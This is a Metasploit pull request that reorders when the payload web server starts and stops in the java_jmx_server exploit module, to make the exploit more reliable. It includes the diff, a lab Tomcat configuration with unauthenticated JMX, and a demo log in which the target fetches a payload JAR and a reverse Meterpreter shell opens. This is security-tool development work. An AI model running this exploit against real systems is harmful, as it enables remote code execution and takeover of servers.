### PR TITLE
java_jmx_server fix: Change start order

### DIFF
--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -120,6 +120,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    vprint_status("Starting service...")
+    start_service
+
     @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
     connect
 
@@ -165,6 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote
       method: 'run'
     )
     disconnect
+    vprint_status("Stopping service...")
+    stop_service
   end
 
   def is_rmi?
@@ -242,9 +247,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def load_payload_from_url(conn_stub)
-    vprint_status("Starting service...")
-    start_service
-
     vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
 
     begin
@@ -308,9 +310,6 @@ class Metasploit3 < Msf::Exploit::Remote
     rescue ::Rex::Proto::Rmi::Exception => e
       vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}")
       return false
-    ensure
-      vprint_status("Stopping service...")
-      stop_service
     end
 
     if res.nil?


### PR DESCRIPTION
This pull request changes the start order of the mlet web server to increase exploit reliability. 

During a short test, I noticed that it was possible to deploy the mbean to the vulnerable service, however the exploit did not succeed (see [Issue 5918](https://github.com/rapid7/metasploit-framework/issues/5918)).

When the payload is executed, the jmx service tries to recall the URL from were he loaded the mbean. At this time the http service is already down, making the exploit fail.

This problem is solved by starting the web service at the beginning and shutting it down at the end.

Test environment:
Debian 7, Tomcat 7 (default debian installation).
JMX support was activated through /etc/default/tomcat7:

```
JAVA_OPTS="-Djava.rmi.server.hostname=192.168.178.236 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Djava.awt.headless=true -Xmx128m -XX:+UseConcMarkSweepGC"
```

Demo:

```
msf exploit(java_jmx_server) > exploit

[*] Started reverse handler on 192.168.178.1:4444
[*] Using URL: http://192.168.178.1:8080/s5FANTPfW
[*] 192.168.178.236:1099 - Sending RMI Header...
[*] 192.168.178.236:1099 - Discovering the JMXRMI endpoint...
[+] 192.168.178.236:1099 - JMXRMI endpoint on 192.168.178.236:33701
[*] 192.168.178.236:1099 - Proceeding with handshake...
[+] 192.168.178.236:1099 - Handshake with JMX MBean server on 192.168.178.236:33701
[*] 192.168.178.236:1099 - Loading payload...
[*] 192.168.178.236  java_jmx_server - Replied to request for mlet
[*] 192.168.178.236  java_jmx_server - Replied to request for payload JAR
[*] 192.168.178.236:1099 - Executing payload...
[*] 192.168.178.236  java_jmx_server - Replied to request for payload JAR
[*] 192.168.178.236  java_jmx_server - Replied to request for payload JAR
[*] Sending stage (45643 bytes) to 192.168.178.236
[*] Meterpreter session 1 opened (192.168.178.1:4444 -> 192.168.178.236:43512) at 2015-09-12 19:38:47 +0200
[*] Server stopped.

meterpreter > getuid
Server username: tomcat7
meterpreter >
```
